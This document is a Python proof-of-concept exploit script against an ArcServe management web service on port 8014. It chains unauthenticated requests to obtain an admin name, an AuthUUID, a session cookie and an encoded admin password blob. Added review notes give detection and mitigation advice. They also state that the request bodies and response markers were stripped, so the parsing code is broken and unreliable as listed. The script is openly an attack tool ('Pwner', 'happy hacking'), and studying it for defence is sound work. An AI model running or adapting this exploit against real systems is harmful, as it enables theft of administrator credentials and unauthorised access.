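#!/usr/bin/env python3
# ArcServe Exploit by Juan Manuel Fernandez (@TheXC3LL) - MDSec
"""Proof-of-concept listing for an ArcServe web-service credential disclosure.

Review notes on this copy of the script:

* Flow shown: three POSTs to the management web service on TCP 8014.
  A call to ``FlashServiceImpl`` that carries no session cookie is parsed
  for an admin name and an AuthUUID; a call to ``VirtualStandbyServiceImpl``
  sends that UUID and reads a session cookie from ``Set-Cookie``; a second
  ``FlashServiceImpl`` call with the cookie is parsed for a password blob.
* Every request body and every response marker is an empty string here.
  The markup they held was lost when the page was extracted, so the
  ``find('')`` calls and the ``+ 15`` / ``+ 14`` offsets do not line up
  with anything visible and the script does not work as listed.
* The password value is base64-decoded, its first 0x80 bytes are dropped,
  and the rest is printed as a byte list for a separate decrypter; it is
  not plaintext at that point.
* Detection: POSTs to ``/WebServiceImpl/services/FlashServiceImpl`` and
  ``/WebServiceImpl/services/VirtualStandbyServiceImpl`` on port 8014 in
  quick succession from a host that is not a known management station.
* Mitigation: limit reachability of port 8014 to administrative hosts and
  install the vendor's fixed release (this page names neither the advisory
  nor the affected versions). If the request sequence above is seen from an
  unexpected source, treat the admin credential as exposed and rotate it.
"""
import sys
import requests
import urllib3
import base64

# Certificate validation is switched off on every request below
# (verify=False) and the resulting warning is silenced here, so the script
# has no assurance about which host actually answers.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Module-level state: written by getUUID(), read by validate().
adminname = ""


def getUUID(ip):
    """Request the admin name and AuthUUID from FlashServiceImpl.

    Args:
        ip: Host name or address of the target; used to build the URL.

    Returns:
        The substring of the response taken as the AuthUUID.

    Side effects:
        Sets the module-level ``adminname`` and prints both values.
    """
    # Request body is empty in this copy of the page (markup stripped).
    payload = ''
    req = requests.post(
        'https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl',
        data=payload, verify=False, allow_redirects=False)
    output = req.text
    global adminname
    # The start/end markers are empty in this copy, so find('') returns 0
    # and these slices do not extract the intended fields as listed.
    adminname = output[output.find('') + 15:output.find('')]
    uuid = output[output.find('') + 14:output.find('')]
    print("\t[+] AdminName: " + adminname)
    print("\t[+] AuthUUID: " + uuid)
    return uuid


def getSession(ip, uuid):
    """Send the AuthUUID to VirtualStandbyServiceImpl and read the cookie.

    Args:
        ip: Host name or address of the target.
        uuid: Value returned by getUUID().

    Returns:
        The first ``name=value`` pair of the ``Set-Cookie`` header when the
        response status is 200; otherwise None (implicit return).
    """
    # The wrapper around the UUID is empty in this copy (markup stripped).
    payload = '' + uuid + ''
    req = requests.post(
        'https://' + ip + ':8014/WebServiceImpl/services/VirtualStandbyServiceImpl',
        data=payload, verify=False, allow_redirects=False)
    output = req.text
    if req.status_code == 200:
        cookie = req.headers["Set-Cookie"]
        # Keep only the part before the first ';' (drops cookie attributes).
        session = cookie[:cookie.find(";")]
        print("\t[+] Session: " + session)
        return session


def validate(ip, session):
    """Repeat the FlashServiceImpl call with the session cookie attached.

    A 500 status is reported as an invalid session. Any other status is
    reported as valid, and the response is parsed for a password blob that
    is printed as a list of byte values.

    Args:
        ip: Host name or address of the target.
        session: Cookie string returned by getSession().
    """
    # Request body is empty in this copy of the page (markup stripped).
    payload = ''
    headers = {'Cookie': session}
    req = requests.post(
        'https://' + ip + ':8014/WebServiceImpl/services/FlashServiceImpl',
        data=payload, headers=headers, verify=False, allow_redirects=False)
    if req.status_code == 500:
        print("[!] Failed. Session is invalid :(")
    else:
        print("[*] Session is valid")
        output = req.text
        print("\t[+] Admin: " + adminname)
        # Marker strings are empty in this copy; find('') never returns -1,
        # so the "no password" branch is unreachable as listed.
        if output.find('') == -1:
            print("\t[-] No password returned")
        else:
            password = output[output.find('') + 14:output.find('')]
            # Retry with one, then two, padding characters. Only decoding
            # errors are caught (binascii.Error is a ValueError subclass),
            # so an interrupt or an unrelated failure is no longer swallowed
            # the way the original bare "except:" did.
            try:
                password = base64.b64decode(password)
            except ValueError:
                try:
                    password = base64.b64decode(password + "=")
                except ValueError:
                    password = base64.b64decode(password + "==")
            # Drop the first 0x80 bytes; the page does not say what they hold.
            password = password[0x80:]
            final = []
            for x in password:
                final.append(str(x))
            print("\t[+] Password: {" + ', '.join(final) + "}; // Paste it to the decrypter")
            print("\n\nHave a happy hacking! ^_^")


if __name__ == '__main__':
    print("\t\t-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-\n\n")
    if len(sys.argv) != 2:
        # The argument placeholder after the script name is missing from this
        # copy; the script takes exactly one argument, the target host.
        print("[!] Error! Syntax: ArcPwn.py ")
        # sys.exit instead of the site-provided exit(), which is not
        # guaranteed to exist (e.g. when run with -S).
        sys.exit(-1)
    target = sys.argv[1]
    print("[*] Triggering info leak")
    uuid = getUUID(target)
    print("[*] Getting a valid session")
    session = getSession(target, uuid)
    print("[*] Doing an authenticated request to validate if session is valid")
    validate(target, session)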